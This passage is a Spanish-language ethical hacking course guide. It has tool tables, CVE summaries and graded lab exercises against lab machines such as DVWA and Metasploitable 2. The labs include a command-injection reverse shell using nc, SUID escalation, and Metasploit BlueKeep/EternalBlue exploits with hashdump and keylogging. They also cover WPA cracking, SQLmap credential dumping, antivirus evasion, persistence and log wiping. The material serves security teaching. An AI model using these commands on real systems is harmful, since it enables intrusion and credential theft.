- HTTP/3: protocolo QUIC sobre UDP, siempre cifrado, sin bloqueo head-of-line
- SSL/TLS: cifrado híbrido (asimétrico para clave de sesión + simétrico para datos); puerto 443 HTTPS; TLS 1.3 recomendado
- PKI: CA (firma certificados), RA (verifica identidad), VA (OCSP), Repositorios, Titulares; Certificate Transparency (SCT)
- Certificados: tipos por finalidad (personal, servidor SSL, software, CA); tipos por validación (DV, OV, EV); tipos por soporte (software, smart card/token)
- Ataques SSL/TLS: BEAST (2011, SSL+TLS1.0), Heartbleed (2014, OpenSSL, lee RAM), POODLE (2014, downgrade SSL3), FREAK (2015, cifrado exportación), ROBOT (2017, Bleichenbacher), SSLstrip (2009, elimina HTTPS via MITM)
- HSTS, HSTS Preload como defensas contra SSLstrip
- Autenticación web: formulario POST, Basic Auth (Base64, inseguro sin TLS), Digest Auth (MD5), NTLM; SSO, Identidad Federada (SAML), OpenID Connect; OTP, Security Token hardware, PKI/certificados, Biometría; FIDO2/WebAuthn, U2F
- Técnicas de auditoría: fingerprinting/banner grabbing (Nmap NSE, Whatweb, Wappalyzer, curl, telnet, nc, Wireshark), website mirroring (wget, HTTrack), escaneo de vulnerabilidades (ZAP, Burp Suite, Nikto)
- Vulnerabilidades web: secuestro de sesiones, SQLi, Cmd Injection, LFI/RFI, XSS (reflejado/almacenado/DOM), CSRF, SSRF, XXE, Path Traversal, RCE, webshells, defacement
- Weevely: webshell PHP con 30+ módulos de post-explotación (system_info, net_ifconfig, audit_etcpasswd, audit_suidsgid, shell_sh, net_scan, net_proxy)
- SQLmap: dbs, tables, columns, dump; hashcat para crackear hashes obtenidos
- XSS: `encodeURI(document.cookie)`, flag `HttpOnly` como defensa
- Cmd Injection: operadores `;`, `&&`, `||`; reverse shell; escalada con SUID (nmap --interactive → GTFOBins)
- Informes: informe técnico (equipo IT) e informe ejecutivo (dirección); herramienta Dradis

### UD5 — Auditoría de Sistemas
[Resumen UD05](https://alyraluca.github.io/cibersecurity/Hacking%20%C3%89tico/hacking_etico_tema5.html)

- Pentesting by Design: proceso continuo 24×7
- Fases EC-Council: Footprinting → Scanning → Gaining Access → Maintaining Access → Clearing Tracks
- Análisis de vulnerabilidades: Nessus, GVM/OpenVAS, Nexpose, Nmap+NSE, Nikto, Lynis; CVSS y CVE
- Autenticación Windows: SAM (hashes NTLM locales), SYSKEY (RC4, eliminado en Win10 1709), NTLM (challenge/response), Kerberos (AS/TGS/SS, tickets TGT/ST)
- Autenticación Unix: `/etc/shadow`, salteado de hashes (SHA-512 = `$6$`), mucho más seguro que SAM
- Ataques a contraseñas: diccionario, fuerza bruta (máscaras), tablas rainbow (ineficaz contra salteado), Pass-the-Hash, envenenamiento LLMNR/NBT-NS (Responder.py → hashcat -m 5600)
- Buffer Overflow: heap overflow (más habitual), stack overflow; zonas de memoria (.text, .data, .bss, heap↑, stack↓); mitigaciones DEP y ASLR
- Exploits: cabecera + payload; fases (7 pasos); Spectre/Meltdown (ejecución especulativa)
- Metasploit Framework (Rapid7): 1500+ exploits; módulos Auxiliary, Exploits, Payloads (singles/stagers/staged), Encoders, Post, Evasion, Nops; interfaces msfconsole/Armitage/Metasploit Pro
- Meterpreter: payload staged, TLS, en memoria; comandos sysinfo, getuid, getsystem, hashdump, migrate, screenshot, keyscan_start/dump, portfwd
- Dispositivos hardware: BeEF (explotar navegadores; macOS/Linux, SQLite, Node.js), Rubber Ducky/BadUSB/Flipper Zero (emulador HID), Keylogger hardware (entre USB y teclado), LAN Turtle (adaptador USB de red encubierto)
- Evasión de AV: no usar Virustotal, simplicidad, msfvenom + encoders, compilar en C (cross-compile), ofuscación/cifrado AES (Hyperion), Veil-Evasion, TheFatRat, Shellter
- Escalada de privilegios: horizontal (otra cuenta similar), vertical (cuenta de admin/root); técnicas: DLL Hijacking, exploits de kernel, servicios mal configurados, webshells, sudo misconfiguration, setuid/setgid, Named Pipes
- Post-explotación: pivoting/movimiento lateral, relaying/port forwarding, keyloggers (kernel/rootkit, JS, inyección de memoria), Empire (PowerShell)
- Persistencia: backdoors, rootkits, C2/Fast Flux DNS/DGA, LOTL (PowerShell, cron, registro Windows Run/RunOnce, WMI, WinRM, tareas programadas)
- Borrado de huellas: deshabilitar auditoría (auditpol), limpiar logs (wevtutil cl, sed, /dev/null), borrar historial bash, túneles ICMP/DNS, NTFS ADS, deshabilitar Superfetch/puntos de restauración/hibernación

---

## 3. Herramientas por fase de auditoría

### Recolección de información (Information Gathering)

| Herramienta | Tipo | Para qué | UD |
|---|---|---|---|
| **nmap / zenmap** | CLI / GUI | Escaneo de red, puertos, OS, versiones; scripts NSE | UD1, UD2 |
| **masscan** | CLI | Escaneo masivo de Internet, mucho más rápido que nmap | UD2 |
| **zmap** | CLI | Escaneo masivo de un puerto en todo Internet | UD2 |
| **unicornscan** | CLI | Escaneo versátil, más rápido que nmap | UD2 |
| **shodan** | Web / CLI | Buscador de dispositivos IoT, servidores, routers en Internet | UD1 |
| **censys** | Web | Similar a Shodan; especializado en certificados digitales | UD1 |
| **zoomeye** | Web | Alternativa china a Shodan | UD1 |
| **robtex** | Web | IPs, dominios, ASN, rutas | UD1 |
| **hunter.io** | Web | Correos electrónicos de un dominio | UD1 |
| **IntelligenceX** | Web | Leaks, PDFs, credenciales filtradas | UD1 |
| **Maltego** | GUI | Análisis de relaciones OSINT | UD2 |
| **amass** | CLI | Enumeración DNS completa | UD1 |
| **knockpy** | CLI | Reconocimiento de subdominios con bruteforce | UD1 |
| **dnsrecon** | CLI | Enumeración DNS con fuerza bruta | UD1 |
| **dnsenum** | CLI | Enumeración DNS + transferencia de zona | UD1 |
| **theHarvester** | CLI | Correos, subdominios, IPs desde OSINT | UD1 |
| **fierce** | CLI | Reconocimiento DNS | UD2 |
| **whois** | CLI | Información de propietario de IP/dominio | UD1 |
| **dig / host / nslookup** | CLI | Consultas DNS (todos los tipos de registro) | UD1 |
| **airodump-ng** | CLI | Reconocimiento WiFi pasivo (modo monitor) | UD3 |
| **whatweb** | CLI | Fingerprinting web: 1800+ plugins, detecta CMS/versiones | UD4 |
| **Wappalyzer** | Extensión | Detección de tecnologías web en tiempo real | UD4 |
| **Wireshark** | GUI | Captura y análisis de tráfico de red | UD2, UD4 |

### Análisis de vulnerabilidades

| Herramienta | Tipo | Para qué | UD |
|---|---|---|---|
| **Tenable Nessus** | Web GUI | Escáner profesional (Essentials: límite 16 hosts) | UD5 |
| **GVM / OpenVAS** | Web GUI | Escáner open source alternativo a Nessus | UD1, UD5 |
| **Nexpose** | Web GUI | Gestión de vulnerabilidades (Rapid7) | UD1, UD5 |
| **OWASP ZAP** | GUI / CLI | Proxy + escáner web activo/pasivo, fuzzer, spider | UD4 |
| **Burp Suite** | GUI | Proxy de interceptación HTTP/HTTPS, suite de auditoría web | UD4 |
| **Nikto** | CLI | Escáner web: errores de configuración, software desactualizado | UD4 |
| **wpscan** | CLI | Vulnerabilidades específicas de WordPress | UD1 |
| **Lynis** | CLI | Auditoría de hardening en sistemas Linux | UD1, UD5 |
| **nmap --script=vuln** | CLI | Scripts NSE para detección de vulnerabilidades | UD2 |
| **SSLLabs** | Web | Auditoría de configuración TLS de servidores | UD4 |

### Explotación

| Herramienta | Tipo | Para qué | UD |
|---|---|---|---|
| **Metasploit Framework** | CLI / GUI | Framework de explotación con 1500+ exploits | UD5 |
| **msfvenom** | CLI | Generación de payloads y encoders | UD5 |
| **Veil-Evasion** | CLI | Payloads de Metasploit que evaden antivirus | UD5 |
| **TheFatRat** | CLI | Backdoors multiplataforma automatizados | UD5 |
| **Shellter** | CLI | Inyectar payloads en ejecutables legítimos Windows | UD5 |
| **BeEF** | Web GUI | Explotación de navegadores (Browser Exploitation Framework) | UD5 |
| **S.E.T.** | CLI | Social Engineering Toolkit | UD1 |
| **aireplay-ng** | CLI | Inyección de paquetes WiFi (deauth, fake-auth, ARP replay) | UD3 |
| **reaver / bully** | CLI | Ataque de fuerza bruta contra WPS PIN; Pixie-Dust con `-d` | UD3 |
| **SQLmap** | CLI | Automatización de inyección SQL | UD4 |
| **arping** | CLI | ARP Spoofing / ARP poisoning | UD2 |
| **hping3** | CLI | Escaneo TCP/UDP con mayor control; tunneling ICMP | UD2 |
| **fragrouter** | CLI | Session splitting para evadir IDS | UD2 |

### Post-explotación

| Herramienta | Tipo | Para qué | UD |
|---|---|---|---|
| **Meterpreter** | Payload | Intérprete interactivo completo; keylogger, hashdump, screenshot, migrate | UD5 |
| **Mimikatz** | CLI | Volcado de hashes, tickets Kerberos y credenciales de memoria LSASS | UD5 |
| **pwdump8** | CLI | Volcado de hashes NTLM de la SAM local | UD5 |
| **Empire** | CLI | Post-explotación con agentes PowerShell sin powershell.exe | UD5 |
| **weevely** | CLI | Webshell PHP con 30+ módulos de post-explotación | UD4 |
| **Responder.py** | CLI | Envenenamiento LLMNR/NBT-NS para capturar hashes NTLMv2 | UD5 |
| **pth-winexe** | CLI | Ejecución remota en Windows usando Pass-the-Hash | UD5 |
| **iodine / ptunnel-ng** | CLI | Tunneling DNS / ICMP para evasión y exfiltración | UD2, UD5 |
| **PEASS-ng (linPEAS/winPEAS)** | CLI | Enumeración automática de vías de escalada de privilegios | UD5 |

### Auditoría WiFi (suite aircrack-ng)

| Herramienta | Para qué |
|---|---|
| `airmon-ng start wlan0` | Activar modo monitor → crea `wlan0mon` |
| `airodump-ng wlan0mon` | Reconocimiento pasivo de redes y clientes |
| `airodump-ng -c CH --bssid BSSID -w cap wlan0mon` | Capturar handshake / IVs de una red específica |
| `aireplay-ng -1 0 -a BSSID wlan0mon` | Fake authentication (asociarse al AP para WEP) |
| `aireplay-ng -3 -b BSSID wlan0mon` | ARP Replay (generar IVs rápidamente para WEP) |
| `aireplay-ng --deauth 5 -a BSSID wlan0mon` | Desautenticar clientes para capturar handshake WPA |
| `aircrack-ng -a 1 captura.ivs` | Romper clave WEP por criptoanálisis estadístico |
| `aircrack-ng -w diccionario.txt handshake.cap` | Romper WPA por diccionario |
| `genpmk -f dict.txt -d hashes_pmk -s "SSID"` | Precalcular PMKs (cowpatty) |
| `cowpatty -d hashes_pmk -r handshake.cap -s "SSID"` | Ataque WPA con PMKs precalculados (~0.5 s) |
| `airolib-ng testwifi --import passwd dict.txt` | Crear BD de PMKs con SQLite |
| `hashcat -a 0 -m 22000 fichero.hccapx dict.txt` | Romper handshake WPA con GPU |

### Cracking de contraseñas

| Herramienta | Para qué | Modos destacados |
|---|---|---|
| **hashcat** | Cracker más rápido del mundo (GPU) | `-a 0` dict, `-a 3` mask, `-a 6` híbrido; `-m 1800` SHA512-Unix, `-m 5600` NTLMv2, `-m 0` MD5 |
| **John the Ripper** | Cracker multiplataforma clásico | Diccionario, fuerza bruta, reglas |
| **L0phtCrack** | Contraseñas Windows con GPU | Rompe 8 chars en < 2h |
| **Ophcrack** | Rainbow tables para Windows | Tablas LM/NTLM precalculadas |
| **RainbowCrack** | Ataque offline con tablas rainbow | Ineficaz contra hashes salteados |
| **pwdump8** | Volcar SAM de Windows | Requiere privilegios de Administrador |
| **hydra / medusa** | Fuerza bruta online | HTTP, FTP, SSH, SMB, etc. |
| **wfuzz** | Fuzzing de parámetros web | Contraseñas, directorios, parámetros |
| **CUPP** | Generador de diccionarios | Diccionarios personalizados a partir de datos de la víctima |
| **CeWL** | Generador de diccionarios | Extrae palabras de un sitio web para crear wordlists |

### Informes

| Herramienta | Para qué |
|---|---|
| **Dradis** | Importa resultados de 20+ herramientas; exporta a Word/Excel/HTML; trabajo colaborativo |
| **OWASP ZAP** | Exporta informes HTML/XML/JSON clasificados por riesgo |
| **Nessus** | Informes ejecutivos HTML/CSV de vulnerabilidades |

---

## 4. Tecnologías y conceptos clave

### Protocolos y estándares

| Protocolo/Estándar | Descripción | UD |
|---|---|---|
| TCP/IP | Base de Internet; sin autenticación originalmente (vulnerabilidad de diseño) | UD2 |
| HTTP/1.1 | Puerto 80, stateless, texto plano | UD4 |
| HTTP/2 | Multiplexación, binario, TLS obligatorio; CVE-2023-44487 | UD4 |
| HTTP/3 / QUIC | UDP, siempre cifrado, sin bloqueo head-of-line | UD4 |
| HTTPS | HTTP + TLS, puerto 443 | UD4 |
| TLS 1.3 | Versión actual segura; reemplaza SSL y TLS <1.2 | UD4 |
| SSL 3.0 | Completamente obsoleto; vulnerable a POODLE | UD4 |
| DNS | Resolución de nombres; registros A/AAAA/MX/NS/TXT/CNAME/PTR/SOA | UD1 |
| WHOIS (puerto 43/TCP) | Información de propietarios de IPs y dominios | UD1 |
| NTLM | Autenticación Windows challenge/response; vulnerable a PtH y LLMNR poisoning | UD5 |
| Kerberos | Autenticación con tickets en Active Directory (AS, TGS, SS) | UD5 |
| SMB / SMBv3 | Protocolo de compartición de archivos Windows; SMB3 soporta cifrado | UD2 |
| ARP | Resolución MAC↔IP; vulnerable a ARP Spoofing (L2) | UD2 |
| LLMNR / NBT-NS | Resolución de nombres local Windows; vulnerable a envenenamiento | UD5 |
| WEP | RC4 + IV 24 bits; completamente roto | UD3 |
| WPA | RC4 + TKIP + IV 48 bits; débil frente a diccionario | UD3 |
| WPA2 | AES-CCMP + 802.11i completo; seguro con contraseña fuerte | UD3 |
| WPA3 | AES-GCMP-256 + SAE/Dragonfly; resistente a diccionario offline | UD3 |
| WPS | Configuración rápida WiFi; PIN vulnerable (11.000 combinaciones) | UD3 |
| 802.11i | Estándar IEEE de seguridad WiFi (implementado completamente en WPA2) | UD3 |
| SAML | Protocolo de identidad federada | UD4 |
| OpenID Connect | SSO distribuido con OAuth 2.0 | UD4 |
| FIDO2 / WebAuthn | Autenticación sin contraseña (biometría local o hardware token) | UD4 |

### Vulnerabilidades paradigmáticas

| Vulnerabilidad | CVE | CVSS | Qué explota | UD |
|---|---|---|---|---|
| BlueKeep | CVE-2019-0708 | 9.8 CRÍTICA | RDP sin autenticación en Windows | UD5 |
| EternalBlue | MS17-010 | Alta | SMBv1 en Windows (usado en WannaCry) | UD5 |
| Heartbleed | CVE-2014-0160 | Alta | OpenSSL, lee RAM del servidor | UD4 |
| POODLE | CVE-2014-3566 | Media | Downgrade a SSL 3.0 | UD4 |
| BEAST | CVE-2011-3389 | Media | SSL / TLS 1.0 | UD4 |
| FREAK | CVE-2015-0204 | Alta | Cifrado RSA de exportación débil | UD4 |
| ROBOT | — | Alta | RSA PKCS#1 v1.5 (Bleichenbacher 1998) | UD4 |
| KRACK | CVE-2017-13077 | Alta | Reinstalación de claves WPA2 | UD3 |
| DragonBlood | CVE-2019-9494 | Media | Downgrade WPA3 a WPA2 | UD3 |
| Shellshock | CVE-2014-6271 | 9.8 CRÍTICA | Bash en servidores web (CGI) | UD5 |
| vsftpd backdoor | CVE-2011-2523 | Alta | Backdoor en vsftpd 2.3.4 | UD2 |
| Spectre / Meltdown | CVE-2017-5753/5754 | Alta | Ejecución especulativa de CPU | UD5 |
| Rapid Reset HTTP/2 | CVE-2023-44487 | Alta | DoS masivo HTTP/2 (398M rps) | UD4 |

---

## 5. Ruta de aprendizaje

```
[Prerequisitos] → Redes TCP/IP, Linux básico, HTTP básico
       ↓
[UD1] Fundamentos y marco legal
  · Entender qué es el pentesting y qué lo diferencia del análisis de vulnerabilidades
  · Aprender el marco legal (Art. 197 CP)
  · Dominar OSINT: WHOIS, DNS, Google Dorking, Shodan
  · Herramientas: dig, host, nslookup, whois, nmap básico, shodan CLI
       ↓
[UD2] Vulnerabilidades y ataques
  · Clasificar vulnerabilidades (diseño / implementación / uso)
  · Entender y usar CVSS (puntuación) y CVE (catálogo)
  · Conocer los ataques de red más comunes (MITM, DoS, Spoofing)
  · Herramientas: nmap avanzado (NSE, -sV, -O, -A), masscan, arping
       ↓
[UD3] Redes inalámbricas
  · Entender WEP/WPA/WPA2/WPA3 en profundidad
  · Dominar la suite aircrack-ng completa
  · Atacar WEP (ARP replay), WPA (handshake + diccionario), WPS (PIN + Pixie-Dust)
  · Herramientas: airodump-ng, aireplay-ng, aircrack-ng, hashcat, reaver, bully
       ↓
[UD4] Aplicaciones web
  · Dominar HTTP, SSL/TLS, PKI y certificados
  · Conocer los ataques SSL clásicos (Heartbleed, POODLE, BEAST, SSLstrip)
  · Aprender fingerprinting web, escaneo con ZAP/Nikto
  · Explotar XSS, SQLi, Cmd Injection, LFI/RFI con herramientas y manualmente
  · Herramientas: ZAP, Nikto, whatweb, SQLmap, weevely, curl, telnet
       ↓
[UD5] Sistemas operativos
  · Auditoría de contraseñas (hashcat, pwdump, Responder.py)
  · Buffer overflow y exploits
  · Metasploit Framework completo (exploit, payload, post)
  · Escalada de privilegios (Linux: SUID/sudo; Windows: DLL hijacking, bypassUAC)
  · Persistencia y borrado de huellas
  · Herramientas: Metasploit, Meterpreter, Mimikatz, hashcat, Nessus
       ↓
[PROYECTO FINAL] Auditoría completa end-to-end con informe
```

**Tiempo estimado por UD:** 3–4 semanas de trabajo práctico cada una.

---

## 6. Prácticas progresivas

### Nivel básico

#### B1 — Reconocimiento WHOIS y DNS (UD1 P1)

**Objetivo:** Familiarizarse con herramientas de footprinting pasivo.

```bash
# Descargar base de datos RIPE
# https://ftp.ripe.net/ripe/dbase/

# Buscar rangos IP de una empresa en la BD RIPE
zgrep -i "nombre empresa" -B2 ripe.db.gz | egrep "^inetnum:"

# Verificar con whois
whois 213.27.155.208

# Resolver registros DNS
host cocacola.es
host -t mx cocacola.es
host -t TXT cocacola.es

# Consultar servidor MX
host antispam.genetsis.com
```

**Resultado esperado:** Identificar rangos IP de la empresa, servidores de correo (MX) y política SPF.

---

#### B2 — Google Dorking (UD1 P3)

**Objetivo:** Usar operadores avanzados de búsqueda para localizar información expuesta.

Dorks a practicar:

| Dork | Qué busca |
|---|---|
| `intitle:"index of" inurl:/backup` | Listados de directorio con backups |
| `filetype:sql "MySQL dump" (pass\|password)` | Volcados de BD con contraseñas |
| `intitle:"index of" id_rsa -id_rsa.pub` | Claves privadas SSH expuestas |
| `inurl:robots.txt filetype:txt "disallow:"` | Rutas no indexadas |
| `intitle:(confidential\|restricted) filetype:pdf site:gov` | PDFs confidenciales en gobierno |

Recurso: [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)

---

#### B3 — Fingerprinting web básico (UD4 P2)

**Objetivo:** Identificar tecnologías de un servidor web sin explotar nada.

```bash
# Cabeceras con curl
curl -I http://192.168.100.171

# Petición manual con telnet
telnet 192.168.100.171 80
GET / HTTP/1.0
Host: 192.168.100.171

# Whatweb básico
whatweb http://192.168.100.171
whatweb -v http://192.168.100.171/dvwa    # verbose

# Nmap NSE
nmap -p 80 -Pn --script=http-server-header 192.168.100.171
```

---

#### B4 — Comprobación de SSL/TLS en bancos (UD4 P1)

**Objetivo:** Evaluar la configuración TLS de sitios reales.

1. Acceder a [https://www.ssllabs.com](https://www.ssllabs.com) → *Test your browser*
2. Usar *Test your server* con dominios bancarios reales
3. Desde Kali verificar HSTS:

```bash
nmap -p 443 -Pn --script=http-headers banco.es | grep -i Strict-Transport-Security
# Verificar FREAK:
openssl s_client -connect banco.es:443 -cipher EXPORT
```

---

### Nivel intermedio

#### I1 — Enumeración DNS con bruteforce (UD1 P2)

**Objetivo:** Descubrir subdominios ocultos de un servidor DNS propio.

```bash
# Escaneo básico con airodump
knockpy --dns 192.168.1.1 fpmislata.ceti --bruteforce

# Dnsrecon con diccionario
dnsrecon -d fpmislata.ceti -n 192.168.100.111 -t brt

# Con diccionario propio
dnsrecon -d fpmislata.ceti -D ./dict.txt -n 192.168.100.111 -t brt \
  -j /home/user/output.json

# Amass
amass enum -v -brute -tr ip-dns -d zonetransfer.me

# Dnsenum
dnsenum fpmislata.ceti --dnsserver 192.168.100.111
```

**Reto:** Descubrir los 32 FQDNs ocultos en `io.cursos-tic.es` (dominio del profesor, con autorización).

---

#### I2 — Reconocimiento con NMAP avanzado (UD2 P2)

**Objetivo:** Realizar un reconocimiento completo de una máquina objetivo.

```bash
# Descubrimiento de hosts
nmap -sn 172.16.203.0/24

# Escaneo completo
nmap -A 192.168.100.171

# Todos los puertos + versiones
nmap -p- -sV 192.168.100.171

# Scripts de vulnerabilidades
nmap -Pn --script=vuln -p21 192.168.100.171

# Detectar backdoor vsftpd 2.3.4
nmap -Pn --script=ftp-vsftpd-backdoor -p21 192.168.100.171

# Comparativa con masscan
masscan -p20-9000 --wait=0 192.168.100.171
```

---

#### I3 — ARP Spoofing (UD2 P1)

**Objetivo:** Demostrar un ataque MITM en red local y la solución con cifrado SMB.

```bash
# Escenario: gateway=172.16.203.254, víctima=172.16.203.100

# ARP Spoofing básico
sudo arping -p -U -S 172.16.203.254 172.16.203.100

# DoS con MAC inexistente
sudo arping -p -U -s ca:ca:ca:ca:ca:ca -S 172.16.203.254 172.16.203.100

# Restaurar caché ARP
sudo arping -p -U -s 00:11:22:33:44:55 -S 172.16.203.254 172.16.203.100
```

```powershell
# Solución en servidor Windows: habilitar cifrado SMB3
Set-SmbShare -Name <sharename> -EncryptData $true
Set-SmbServerConfiguration -EncryptData $true
```

---

#### I4 — Ataque WEP completo (UD3)

**Objetivo:** Obtener la clave WEP de una red de laboratorio.

```bash
# 1. Activar modo monitor
airmon-ng start wlan0

# 2. Reconocimiento
airodump-ng wlan0mon

# 3. Capturar IVs de la red objetivo
airodump-ng wlan0mon --bssid BSSID -c CH --ivs -w captura

# 4. Fake authentication
aireplay-ng -1 0 -a BSSID wlan0mon

# 5. ARP Replay (objetivo: >40.000 IVs en el campo #Data)
aireplay-ng -3 -b BSSID -x 500 wlan0mon

# 6. Romper la clave
aircrack-ng -a 1 captura.ivs
```

---

#### I5 — Ataque WPA por diccionario (UD3)

**Objetivo:** Capturar handshake y romper una contraseña WPA débil.

```bash
# 1. Capturar handshake
airodump-ng wlan0mon -c CANAL --bssid BSSID -w handshake

# 2. Forzar desconexión de un cliente
aireplay-ng --deauth 5 -a BSSID wlan0mon

# 3. Romper con diccionario
aircrack-ng -w diccionario.txt handshake.cap

# 4. Método más rápido: PMKs precalculados
genpmk -f diccionario.txt -d hashes_pmk -s "SSID"
cowpatty -d hashes_pmk -r handshake.cap -s "SSID"

# 5. Con GPU (máquina real, convertir previamente en hashcat.net/cap2hashcat)
hashcat -a 0 -m 22000 fichero.hccapx diccionario.txt
```

---

#### I6 — Análisis de vulnerabilidades con Nikto (UD4 P4)

**Objetivo:** Identificar vulnerabilidades de configuración en un servidor web.

```bash
# Escaneo básico de DVWA
nikto -h http://192.168.100.171/dvwa

# Con cookie de sesión (editar primero /etc/nikto.conf)
# STATIC-COOKIE=security=low; PHPSESSID=tu_session_id

# Generar informe HTML
nikto -h http://192.168.100.171/dvwa -Format html -output dvwa.html

# Plugins específicos
nikto -h http://192.168.100.171 -Plugins headers,outdated,cookies
```

---

#### I7 — Auditoría de contraseñas Linux con Hashcat (UD5 P1)

**Objetivo:** Romper hashes SHA-512 con distintos modos de ataque.

```bash
# Modo 0: diccionario
hashcat -a 0 -m 1800 hashes.txt diccionario.txt --potfile-disable

# Modo 3: máscara (3 minúsculas + 3 dígitos)
hashcat -a 3 -m 1800 hashes.txt ?l?l?l?d?d?d --potfile-disable

# Modo 6: híbrido (palabra + año 2000-2020)
hashcat -a 6 -m 1800 hashes.txt diccionario.txt -1 012 20?1?d --potfile-disable
```

---

### Nivel avanzado

#### A1 — Auditoría web completa con OWASP ZAP (UD4 P5)

**Objetivo:** Realizar una auditoría completa de DVWA y Mutillidae con ZAP.

Flujo:
1. Configurar ZAP como proxy del navegador
2. **Spider** en `/dvwa/` y `/mutillidae/`
3. **Escaneo activo** → registrar vulnerabilidades en tabla (nombre, riesgo, descripción, solución)
4. **Fuzzing de parámetros:**
   - POST `password` en Mutillidae → identificar respuesta con tamaño diferente
   - GET `id=` en DVWA SQLi → payloads MS SQL de ZAP
   - GET `name=` en DVWA XSS → payloads XSS de ZAP
   - GET `page=` en DVWA LFI → payloads path traversal
5. Exportar informe HTML desde ZAP

---

#### A2 — SQLi manual + SQLmap + Hashcat (UD4)

**Objetivo:** Extraer y crackear credenciales de base de datos.

```bash
# SQLi manual en DVWA level low
# URL: http://192.168.100.171/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
# Payload: ' UNION SELECT "bd", DATABASE() #

# SQLmap: listar BDs
sqlmap -u "http://192.168.100.171/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \
  --dbs --cookie="security=low; PHPSESSID=TU_SESSID"

# Volcar usuarios y hashes
sqlmap -u "..." -D dvwa -T users -C user,password --dump --cookie="..."

# Crackear hashes MD5 con hashcat
hashcat -a 0 -m 0 hashes.txt diccionario.txt
# admin → password | gordo → abc123
```

---

#### A3 — Cmd Injection + Reverse Shell + Escalada SUID (UD4)

**Objetivo:** Ganar acceso a Metasploitable 2 mediante inyección de comandos y escalar privilegios.

```bash
# En campo IP de DVWA level medium, usar || (bypass de && y ;)
noexiste||id
noexiste||nc 192.168.100.111 6666 -e /bin/bash

# En máquina atacante: escuchar
nc -lnvp 6666

# Mejorar shell a TTY interactivo
python -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z → stty raw -echo → fg → export XTERM=screen SHELL=/bin/bash

# Buscar binarios SUID para escalada
find / -perm -4000 2>/dev/null
# nmap con SUID → escalada a root
nmap --interactive
# nmap> !sh   →   whoami: root
```

---

#### A4 — Explotación con Metasploit (UD5 P4)

**Objetivo:** Explotar BlueKeep y EternalBlue con Metasploit; post-explotación completa.

```bash
# Configurar Metasploit con BD
systemctl start postgresql.service && msfdb init && msfconsole

# Reconocimiento integrado
msf6> db_nmap -sV -O 192.168.100.164
msf6> hosts && services

# BlueKeep (CVE-2019-0708)
msf6> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6> set RHOSTS 192.168.100.164
msf6> set target 1
msf6> exploit

# Post-explotación con Meterpreter
meterpreter> sysinfo && getuid
meterpreter> getsystem
meterpreter> hashdump
meterpreter> migrate 1924        # migrar al proceso del usuario
meterpreter> keyscan_start -v
meterpreter> keyscan_dump

# EternalBlue (MS17-010 / WannaCry)
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS ip_objetivo
msf6> exploit
```

**Nota:** si el exploit de BlueKeep cuelga la máquina víctima, revisar el ajuste de `GroomBase` — ver [pentest-tools.com – BlueKeep con Metasploit](https://pentest-tools.com/blog/bluekeep-exploit-metasploit#5-adjusting-the-bluekeep-exploit-groombase).

---

#### A5 — Análisis de vulnerabilidades con Nessus (UD5 P3)

**Objetivo:** Comparar resultados de escaneo con y sin credenciales.

1. Crear política **sin credenciales** (caja negra) → escanear Metasploitable 2
2. Crear política **con credenciales SSH** (caja gris) → escanear de nuevo
3. Comparar: con credenciales aparece Shellshock (CVE-2014-6271, CVSS 9.8)
4. Exportar informes HTML y CSV
5. Analizar vulnerabilidades críticas y proponer remediaciones

---

## 7. Proyecto final integrador

### Escenario: Auditoría completa de un entorno híbrido

**Descripción:** Realizar una auditoría de seguridad completa (caja negra) contra un entorno virtual que incluye un servidor web Linux con DVWA, servicios de red vulnerables y una red WiFi de laboratorio. Entregar un informe profesional.

**Máquinas necesarias:**
- Kali Linux (atacante)
- Metasploitable 2 como 192.168.X.Y (objetivo web + servicios)
- Servidor con BIND DNS (para prácticas DNS)
- Router/AP WiFi de laboratorio (para prácticas WiFi)
- Windows vulnerable (opcional, para BlueKeep/EternalBlue)

---

**Fase 1 — Reconocimiento (UD1 + UD2)**

- [ ] Identificar hosts activos con `nmap -sn`
- [ ] Escaneo completo con `nmap -A` o `masscan`
- [ ] Footprinting WHOIS y DNS del dominio del entorno
- [ ] Google Dorking sobre el dominio del entorno
- [ ] Fingerprinting web con `whatweb` y Wappalyzer

**Entregable:** Tabla de hosts, servicios, versiones y superficie de ataque.

---

**Fase 2 — Análisis de vulnerabilidades (UD2 + UD5)**

- [ ] Escaneo Nessus sin credenciales sobre todos los hosts
- [ ] Escaneo Nessus con credenciales SSH en el servidor Linux
- [ ] Escaneo web con OWASP ZAP (spider + escaneo activo sobre DVWA/Mutillidae)
- [ ] Nikto sobre el servidor web
- [ ] Clasificar hallazgos por CVSS (Crítica → Alta → Media → Baja)

**Entregable:** Tabla de vulnerabilidades con CVE, CVSS, descripción y estado.

---

**Fase 3 — Auditoría WiFi (UD3)**

- [ ] Reconocimiento pasivo con `airodump-ng --wps`
- [ ] Verificar si el AP usa WEP o WPA con contraseña débil
- [ ] Intentar ataque WPS (fuerza bruta PIN o Pixie-Dust si aplica)
- [ ] Capturar handshake WPA y atacar con diccionario

**Entregable:** Resultado de la auditoría WiFi (protocolo encontrado, vulnerabilidades, contraseña obtenida si aplica).

---

**Fase 4 — Explotación web (UD4)**

- [ ] Explotar SQLi manualmente en DVWA y con SQLmap; crackear hashes obtenidos
- [ ] Demostrar XSS reflejado con robo de cookie (`encodeURI(document.cookie)`)
- [ ] Explotar Cmd Injection y obtener reverse shell
- [ ] Subir webshell y demostrar ejecución con Weevely
- [ ] Capturar SSID oculto forzando desautenticación

**Entregable:** Evidencias (capturas de pantalla, hashes obtenidos, shell activa).

---

**Fase 5 — Explotación de sistema y post-explotación (UD5)**

- [ ] Explotar vsftpd backdoor con Metasploit NSE o directamente
- [ ] Escalar a root mediante SUID (nmap --interactive) o sudo misconfiguration
- [ ] Volcar `/etc/shadow` y crackear hashes con hashcat
- [ ] Demostrar persistencia: añadir entrada en crontab o registro de Windows
- [ ] Simular borrado de huellas: limpiar `.bash_history` y logs

**Entregable:** Pruebas de acceso root, credenciales crackeadas, demostración de persistencia.

---

**Fase 6 — Informe final**

Estructura del informe:
1. **Portada** — versión, fecha, auditores
2. **Índice**
3. **Introducción** — objeto del informe
4. **Objetivos y alcance** — qué se ha auditado y qué no
5. **Desarrollo** — hallazgos por fases, evidencias, comandos usados
6. **Conclusiones y recomendaciones** — ordenadas por severidad CVSS
